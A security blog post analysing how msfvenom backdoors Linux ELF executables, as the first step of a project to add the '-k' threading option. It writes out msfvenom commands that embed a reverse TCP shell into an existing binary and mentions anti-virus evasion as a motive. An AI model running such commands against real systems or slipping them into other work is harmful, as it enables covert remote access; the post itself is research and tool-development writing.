Sheep Shellcode

The hackery blog of Vincent Moscatello.

Improving Msfvenom Part–1

This is a progress/update on one of my current projects: improving the metasploit framework. In this part I am only doing reverse engineering/analysis of how msfvenom currently backdoors ELF files. This is all in an effort to add the “-k” functionality to ELF executables, the windows equivalent of an exe.

The -k flag is used by msfvenom to start a new thread for a payload that has been backdoored in an executable. This allows an attacker to preserve the original functionality of an executable while still executing the generated shellcode. This can come in quite handing for evading anti-virus. Unfortunately this feature is only available on 32-bit windows executables and msfvenom won’t throw an error when you use this flag on a wrong file format.

Currently when you run the following two commands they will produce an identical executable that does not have the functionality of the “-k” flag.

1
2
3
msfvenom -p linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=31337 -f elf -x a.out > backdooredNoK

msfvenom -p linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=31337 -f elf -k -x a.out > backdoored

This can be verified by performing an md5 hash of the two executables.

To figure out what MsfVenom is actually doing, the executable can be loaded into IDA disassembler for static analysis. Before the program is backdoored, the program entry point (_start) looks like this:

After being backdoored the program entry point (_start) looks like this:

The original program entry point is simply overwritten with the shellcode. This can be verified by comparing the hex view in IDA of the (_start) function to the RAW output of shellcode that can be generated by MsfVenom.

1
msfvenom -p linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=31337 -f raw  > RAW

The hex dump from IDA looks like:

This is identical to the RAW shell code:

In order to make this projectmore manageable I’ve broken it up into five chuncks each of which acts as its own milestone for tackling the problem.

  1. Reverse engineer Windows/Linux executables to determine how msfvenom is currently handling the “-k” option. (where is machine code stored, how is it triggered, is it loading libraries, etc)
  2. Using the gathered information, manually construct shellcode that will start in new thread for linux executable.
  3. Write script that automates the threading process of previous milestone
  4. Write script that embeds the new shellcode that starts in a thread into the elf executable.
  5. Interface this script with msfvenom’s “-k” option